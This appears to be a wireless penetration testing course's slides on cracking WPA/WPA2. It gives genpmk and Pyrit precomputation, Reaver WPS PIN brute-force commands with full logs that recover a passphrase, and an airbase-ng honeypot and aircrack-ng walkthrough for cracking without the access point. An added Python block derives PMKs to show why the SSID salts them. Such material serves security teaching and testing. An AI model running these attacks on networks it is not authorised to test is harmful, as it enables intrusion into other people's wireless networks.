WPA-WPA2
Wireless Pentest
WPA & WPA2
Instructor: Marcos [email protected]
Wireless Protected Access
A little more theory…
WPA - Pre-Shared Key
WPA attack
Decrypting WPA-PSK
WPA2 - PSK
• Uses the same principles as WPA
• The weakness lies in the chosen passphrase
• Nothing more to be said!!!!!
• Procedure identical to the previous one
Speeding up the cracking process
• We can precompute the PMK for a given SSID and a wordlist using the genpmk tool
• genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab"
• Let's create a WPA-PSK network with the passphrase skysign and capture this network's WPA handshake
Measure the time taken with aircrack and compare…
Using the PMK with aircrack
Pyrit for multi-CPU systems
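Added example, not from the original slides: the PMK derivation that genpmk precomputes, written out in Python so the SSID-as-salt step is visible. It shows why a table built for "Wireless Lab" matches nothing under any other SSID; the wordlist and the second SSID are constructed for the demonstration.

```python
import hashlib
import hmac
import struct
import time

def wpa_pmk(passphrase: str, ssid: str, iterations: int = 4096) -> bytes:
    """Derive the 256-bit WPA/WPA2-Personal PMK from a passphrase.

    This is PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes),
    written out block by block so the SSID-as-salt step is visible.
    """
    pw = passphrase.encode("utf-8")
    salt = ssid.encode("utf-8")
    out = b""
    block = 1
    while len(out) < 32:
        # U1 = HMAC(pw, SSID || INT32(block)); Un = HMAC(pw, Un-1); T = U1 ^ ... ^ Un
        u = hmac.new(pw, salt + struct.pack(">I", block), hashlib.sha1).digest()
        t = bytearray(u)
        for _ in range(iterations - 1):
            u = hmac.new(pw, u, hashlib.sha1).digest()
            t = bytearray(a ^ b for a, b in zip(t, u))
        out += bytes(t)
        block += 1
    return out[:32]

def pmk_table(ssid: str, wordlist) -> dict:
    """What genpmk builds for one SSID: the PMK of every candidate passphrase.
    Because the SSID is the salt, the table is useless against any other SSID."""
    return {word: wpa_pmk(word, ssid) for word in wordlist}

def table_hits(table: dict, pmk: bytes) -> list:
    """Return the passphrases whose precomputed PMK equals the given PMK."""
    return [word for word, value in table.items() if value == pmk]

if __name__ == "__main__":
    # Constructed wordlist and second SSID for the demonstration (not from the slides).
    words = ["password", "skysign", "letmein"]
    start = time.perf_counter()
    table = pmk_table("Wireless Lab", words)
    elapsed = time.perf_counter() - start
    print(f"{len(words)} PMKs for 'Wireless Lab' in {elapsed:.3f}s (4096 rounds each)")
    print("same SSID :", table_hits(table, wpa_pmk("skysign", "Wireless Lab")))
    print("other SSID:", table_hits(table, wpa_pmk("skysign", "WirelessLab2")))
```

A non-default SSID forces the table to be rebuilt per network, and a long passphrase is what makes that rebuild expensive.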
How does Reaver work?
• Exploits the vulnerability in WPS (Wi-Fi Protected Setup)
• Brute-forces PINs to reveal the WPA or WPA2 passphrase
• Takes 4 to 10 hours
• Does not work on all APs
Cracking via Reaver
1) airmon-ng start wlan0
2) airodump-ng mon0
In another terminal:
3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Switching mon0 to channel 11
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
Cracking via Reaver
root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] Trying pin 33335674
[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)
[+] Trying pin 44445676
[+] Trying pin 55555678
[+] Trying pin 66665670
[+] Trying pin 77775672
[+] Trying pin 88885674
[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)
[+] Trying pin 99995676
[+] Trying pin 00015677
[+] Trying pin 00025676
[+] Trying pin 00035675
Cracking via Reaver
• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '22838353'
[+] WPA PSK: 'DECADA1234'
[+] AP SSID: 'multipinguim-2'
[+] Nothing done, nothing to save.
Connecting to a WPA network (wpa-supp.conf)
Cracking AP-less WPA Personal
• To crack WPA we need the 4-way handshake:
– Authenticator Nonce, Supplicant Nonce, Authenticator MAC, Supplicant MAC.
– But for this attack we don't need all of these packets:
• Either packets 1 & 2 or packets 2 & 3
• So to crack it we need a WPA-PSK honeypot for the client to connect to; we only need msg 1 and msg 2.
• We don't need to know any passphrase ;-)
1) Set up our honeypot:
airbase-ng -c 3 -a <AP> -e "Wireless Lab" -W 1 -z 2 mon0
2) Start airodump:
airodump-ng -c 3 --bssid <AP> --write sem-AP-WPA-cracking mon0
3) Go back to the airbase screen and watch the clients associating
4) Go back to the airodump screen and check whether it captured the WPA handshake
5) Now run aircrack:
aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap